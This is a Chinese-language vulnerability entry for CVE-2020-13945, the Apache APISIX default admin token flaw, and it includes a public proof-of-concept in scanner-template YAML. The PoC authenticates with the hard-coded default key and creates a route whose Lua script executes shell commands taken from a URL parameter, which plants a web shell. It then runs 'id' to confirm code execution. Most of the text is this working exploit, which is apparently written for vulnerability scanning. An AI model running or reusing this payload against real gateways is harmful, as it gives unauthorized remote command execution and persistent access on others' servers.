漏洞描述
Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token edd1c9f034335f136f87ad84b625c8f1,攻击者利用这个Token可以访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行。
CVE-2020-13945: Apache APISIX 默认密钥漏洞
PoC代码[已公开]
id: CVE-2020-13945
info:
name: Apache APISIX 默认密钥漏洞
author: 不动明王 exp
severity: critical
verified: true
description: |
Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token edd1c9f034335f136f87ad84b625c8f1,攻击者利用这个Token可以访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行。
reference:
- https://github.com/Threekiii/Vulhub-Reproduce/blob/master/Apache%20APISIX%20%E9%BB%98%E8%AE%A4%E5%AF%86%E9%92%A5%E6%BC%8F%E6%B4%9E%20CVE-2020-13945.md
set:
randstr: randomLowercase(16)
rules:
r0:
request:
method: POST
path: /apisix/admin/routes
headers:
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
body: |
{
"uri": "/{{randstr}}",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}
expression: response.status == 201
r1:
request:
method: GET
path: /{{randstr}}?cmd=id
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()